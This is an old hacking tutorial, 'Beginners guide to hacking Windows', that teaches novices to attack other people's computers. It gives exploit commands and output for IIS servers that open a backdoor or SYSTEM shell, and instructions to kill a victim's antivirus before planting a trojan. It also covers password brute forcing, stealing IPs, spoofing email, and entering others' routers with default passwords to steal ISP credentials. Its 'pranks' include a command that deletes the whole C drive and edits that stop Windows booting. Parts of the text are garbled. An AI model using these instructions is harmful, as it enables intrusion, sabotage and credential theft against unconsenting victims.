Beginners guide to hacking WindowsBeginners guide to hacking windows by WindowsHacker

The best way to start hacking is to teach yourself !!! All programs mentioned can be downloaded from http://www.windowshacker.kickme.to/

In thistutorialthere will be explained the basics of hacking and some more advanced hacking techniques. So if your a n00b, read on! VERY IMPORTANT, GOOGLE IS YOUR BEST FRIEND WHEN YOU WANT TO LEARNHOW TO HACK!!

http://www.windowsh4cker.kickme.to

Windows HackerTutorialV2.4

Contents

1) FAQ -Frequently Asked Questions

2) Securing your Windows PC

3) Using a Trojan / RAT

4) Hacking a PC through NETBIOS shares

5) Hacking a PC with a exploit

6) Disconnecting someone from internet (DOS attack) - (Nuking)

7) Getting a PC name, MAC address and user name logged on

8) IP addresses, understanding it

9) IIS (Web server / Web page) hacking

10) Crashing WIN95/WIN98 PC with any access to share

11) Creating undeletable directories remotely

12) Connecting to mIRC through a wingate

13) Anonymous email / Email as any address

14) Resetting and cracking Win2K or WinXP administrator password

15) Connecting to MIRC/KAZAA/ICQ thru a firewall that has certain ports blocked with a SOCKS server

16) Killing programs or processes remotely

17) Getting someone's IP and doing a ping sweep

18) Pranks to pull on someone

19) Cracking a user account locally or remotely - brute force or dictionary attack - Win2K and WinXP

20) Accesing Routers

(1) FAQ -Frequently asked questions

How do I hack? - There is no easy wayhow to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you alot.

What do I need to be able to hack? - Firstly you need to understand how your computers operatingsystem works, networks and protocols works, security settings and general PC knowledge. After you understand how it works you need hacking tools which helps you to hack.

What iscommand prompt(cmd- the little dos Windows)? - Go START, RUN and type in: "cmd"

What can I do in cmd? - You can can do variousthingswith it like run exploits or do a ping request.

Why does some of the hacking tools Idownloadjust close itself when I open them? - Lot's of hacking tools are DOS based and has to be run through CMD. If you double click on the program it will open a DOS box and automaticly close the box. From CMD you can navigate to the directory which your hacking tool is stored in and run it from there. Other hacking tools are GUI ( graphical user interface ) based and it will open like a normal Windows based program.

What is a IP address? - Every computer connected to the Internet or some network has a IP address. Goto START, RUN and type in "cmd" then type in "ipconfig" it will show you your IP adress or adresses. It will look something like this : 81.35.99.84. IP = internet protocol.

How do I find someone's IP adress? - Look further down in thistutorialand use IPSTEALER

What can I do with a IP? - Well you need someone's IP before you can hack, portscan or DOS them.

What is IP ping ? - It's a command you can useto checkif someone's IP address is online,to checkit they connected to the Internet or a network. Incommand prompttype in "ping 192.168.0.21" - this will show you something like this :

Pinging 192.168.0.21 with 32 bytes of data:

Reply from 192.168.0.21: bytes=32 timenet share c=c:

9. Exit from target.. dont forget!C:\WINNT\system32>exit

10. Use share drive, run cmdC:\>net use * \\192.168.1.101\drive_c * /u:myuserType the password for \\192.168.1.101\C: / beavuh labs.usage: jill-win32

An example how to use it :

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a another example :

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969IISHack Version 1.5eEye Digital Securityhttp://www.eEye.comCode By: Ryan Permeh & Marc MaiffreteEye Digital Security takes no responsibility for use of this code.It is for educational purposes only.

Attempting to find an executable directory...Trying directory [scripts]Executable directory found. [scripts]Path to executable directory is [C:\Inetpub\scripts]Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exeSending the exploit...Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.C:\> telnet www.[yourowncompany].com 6969Trying www.[yourowncompany].com...Microsoft(R) Windows NT(TM)(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32>whoamiNT AUTHORITY\SYSTEM

For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.

(10) Crashing Win95/Win98 PC with any access to a share

Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC can be crashed with this /con/con exploit, but you need access to a share on the PC, any access will work.

Create a htm file with the following code in it :

# (remove tht '#' when u type)

click me!

#The pcname, is the PCname of the PC you want to crash ( or the IP ) and the sharename is the share you got access to.When you open the htm file and click on the link, it will crash ( BSOD ) the PC.

(11) Creating undeleteable directories remotely

Now this is something that can really create havoc!!! I tested it on Win9X and Win NT4 .Does not work on Win2k or Win XP. Beware don't try this on yourself!! Windows 9x and NT 4 has a flaw which allows an remote connection to create undeleteable, well practically undeleteable files and directories to be created anywhere on a remote machine. These files and directories can be deleted, but it takes about 2 minutes to delete through dos commands. Download NetBiosBomber, choose the target and choose which OS and you ready to makes someone's life hell. Remember if their system is update it will not work.

(12) Connecting to mIRC through a Wingate

A wingate is like a proxy server, anyone can connect to the server (some do have usernames and passwords), and then work through the server to connect to some other server. Then it will look like you are working form that server, your identity changed. mIRC is a internet relay chat client, a chat room client. Download mIRC now !! In mIRC there is a firewall option, this is where you specify your wingate server. Click the "use firewall" option, make sure its set to socks 4 ! and put in a wingate address in the "hostname". Port should be 1080 with no username or password. Wingate list available from Cyberarmy or you can use any port scanner, or you can use Proxy finder to search for socks wingate on a subnet. Scan any IP range for hosts that's got port 1080 open. Wingates are great for IRC to keep you anonymous.

(13) Anonymous email / Email as any address

Download RA-Anonymous email first. Then choose who u want to send to and from who u want the email to be from. For this to work you will have to find an smtp server that accepts relaying. . So in the server space put in : "smtp.mweb.co.za" - this smtp worked at the time I tested it.. and your are ready to send someone email from billgates@microsoft.com !! :) Use OPENRELAYCHECKER from my downloads page to download OPENRELAYCHECKER which you can use to search for email servers that support relaying.

Alternatively use www.Hidd3d.com to send anonymous email.

(14) Resetting and cracking Win2K or WinXP administrator password

Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or CD. Go to Winnt\system32\config directory. There will be a file called "SAM" Delete that file and reboot machine. Now the Administrator account password will be reset to blank ( no password ). Only works with FAT32 partitions.

For Windows XP need this file which has a few utilities you can use to reset the XP administrator password.

Then there is also a program called AdminHack which you load in a dictionary file to crack the administrator account if you have local access on the PC.

(15) Connecting to MIRC/KAZAA/ICQ thru a firewall that has certain ports blocked with a SOCKS server

When you behind a firewall and MIRC, Kazaa or ICQ is blocked you can use a technique called http tunneling. Basically your program to an program running on your computer and the programs redirects the data thru HTTP. Download HTTPORT or SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect MIRC, Kazaa or ICQQ or whatever program you want to use that is blocked by the firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS server. Server address is 127.0.0.1 - your local IP and socks port is port 1080.

(16) Killing programs or processes remotely

Lets say you try and upload a trojan to someone's machine and their anti virus picks it up. Check if you can get a account on the machine with Administrator rights. If you have an account like that, you can use PSKILL and kill the anti virus program or firewall. You can basically kill any program or process running on the machine, but it must be a Win2k or XP machine. If the person is running norton anti virus the file will be something like nav32.exe. Now with pskill the command will be :

pskill \\66.33.22.11 -u administrator nav32.exe

66.33.22.11 is the IP or pc name of the victim

-u administrator is the account you have admin rights to

Nav32.exe is the program file name or process you want to kill. You can use winlogon.exe even and it will most propably give a blue screen after you killed that process.

So now you killed the anti virus or firewall and now you are ready to upload a trojan or keylogger or anything you like...

(17) Getting someone's IP and doing a ping sweep

Download IPstealer from WindowsHacker and put in your IP, then click on Convert IP, Click on Listen and send your victim the Link to use. When they open that link it will show up in IPstealer.

If you need random IP addresses you can do a ping sweep. It scans a whole IP range and shows you which IP's are online. Download Supercan and put in a IP range. Start 80.23.23.1 to Stop 80.23.23.255 and choose "ping only" under scan type. It will scan the whole IP range and show you which IP's are online.

(18) Pranks to pull on someone

Here is a few things u can do to someone to annoy the living hell out of them :)

1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it contains the following (Win9X only)

C:\Aux\AuxorC:\Con\Con

Now place this in the C:\Windows\Start Menu\Programs\StartUp folder, so when the pc reboots it will throw out a BSOD every time it starts up.

2) Deleting the persons whole C drive with this command : Deltree /y c:/*.*

3) Make a screen shot of the persons desktop. put that picture as their background and hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the windows out of the way, just check how clever your friend really are. Or put a password one a screen saver and put the screen saver file into the startup folder. They will have to boot up into save mode to restore the screen saver.

4) A nice harmless trick, schedule something like a screen saver with a password on a PC for a certain time, sure to make someone scream.

5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON IT. When the PC gets restarted it will come up with that message and it will not boot up @ all. Look for system.ini, change the same, shell="explorer.exe to shell=". Bill Gates Hates You" :)

(19) Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of a account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a dictionary attack while logged onto the machine locally.. You will need a wordlist which Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utilityCopyright (C) 2005-2006 Pranay Kanwar < warl0ck@metaeye.org>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.[+] Trying 77012 words from wordlist.txt for 'guest'[+] Done 21%.[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account your trying to crack

-f is the name of the wordlist you will be using

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Second program we will use is Starbrute

Starbrute can either be used to crack a user account on your own local PC or it can be used to crack a user account on a remote PC. Starbrute uses brute force to guess the password. Meaning it will use Charset:1234567890abcdefghijklmnopqrstuvwxyz in random order to guess the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute 192.168.0.3 guest 3 4 high

Starsky32 IPC bruteforce

Target IP:192.168.0.3 User Account:guest Charset:1234567890abcdefghijklmnopqrstuvwxyz Start lenght:3 Max lenght:4 Process priority: High

Starting... Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.

192.168.0.3 is the IP of the machine your trying to get the account password from.

guest is the account name your trying to crack

3 is start lenght of the password

4 is the maximum lenght of the password

high means the program will use alot of resources - the higher the faster it can guess the password

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

With both these programs you can specify any account on a machine - administrator, guest or whatever.

Remember you can find out what account is logged onto a machine by typing in this command into CMD: nbstat -a IP

It will show you the username currently logged on and then you can try and crack that account password.

(20) Accesing Routers

Routers are devices which is used to route data on a network, it decides where certain traffic should be sent to. Routers acts as a gateway to the Internet and is use by most people these days to access the Internet instead of Modems. A client PC could either be connected to the Router through a LAN cable of with a Wireless card. Routers are mostly configured though a web based system or with a command prompt window (cmd).

Most home users with ADSL use Routers as their gateway to the Internet.

Some Routers are configured so that it can only be administered though the Web based system when your are connected to the Routers local network - the internal LAN.Connecting to the Router you will use your web browser. A typical router IP address would be 192.168.0.1. So this would be the address to use to connect to the Router though a browser: http://192.168.0.1/

If you are using a Router as your Internet gateway try connecting to it. Remember the routers IP address could differ from the example above. If you don't know your Routers IP address goto command prompt and type in: ipconfig

Your local area connection gateway address will be your Routers IP address. Remember the Router is your gateway to the Internet.

When you are connected to your Router though the web based system it will ask you a username and password. If you know the login details use it to log into the Router. If you do not know the login details you can try the default login details as set by the Router manufacturer. Have a look at this list with default login details.

In your Routers configuration you can set settings which the Router uses the connect to the Internet, security settings, local LAN configurations, DHCP settings, port forwarding, statistics and information about the Router status and many more.

Accesing a Router though a command prompt windows can be achived by going to command prompt (cmd) and typing in:

telnet 192.168.0.1 23

23 is the port which the Router will be access with.

You can access someone else's Router over the Internet, login and change settings or even steal their ISP ( internet service provider ) details. When you Telnet to a Router and it brings up the login screen it sometimes will show you what make and model the Router is. Then check the default password list and see if you can login with those default login details and obtain access to the Router. If the person who's Router it is has not changed the Router's default login details you should be able to access the Router easily. Most home users do not change the default passwords. When you access someone else's Router over the Internet, you can change settings, forward ports, reset the Router or even steal their ISP ( internet service provider ) details.

Now if you are able to get into a Router, ADSL router in this case, you will be able to get the hosts ADSL username and password. The password would be masked and hidden behind **** 's but if you right click on the page and look at the source the password most of the time is displayed in clear text. Otherwise use a program like RevelationV2 to unmask the password.

Telnetting to a Marconi ADSL Router with the CX82310 chip from Conexant on port 23 will give the following output:

01/01/99 CONEXANT SYSTEMS, INC.=20 00:04:10 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21 = =20 =20

LOGIN PASSWORD>

And logging into the Router will bring up the main menu:

01/04/99 CONEXANT SYSTEMS, INC. 02:00:45ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29

MAIN MENU

1. SYSTEM STATUS AND CONFIGURATION2. ADSL MENU

4. REMOTE LOGON

Q. LOGOUT

ENTER CHOICE-->

This specific Marconi Router has a vulnerability which if you Telnet to the Router on port 254 ( as shown above ) and the enter key is pressed ( blank login password ) you will gain access to the Router. In this menu you will be able to remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually.

Another vulnerability of this Marconi Router is that when you connect to the Router with the web based GUI ( graphical user inteface ) you will be able to see the ISP password when viewing the webpage source. http://192.168.10.200/Bconfig /System.sht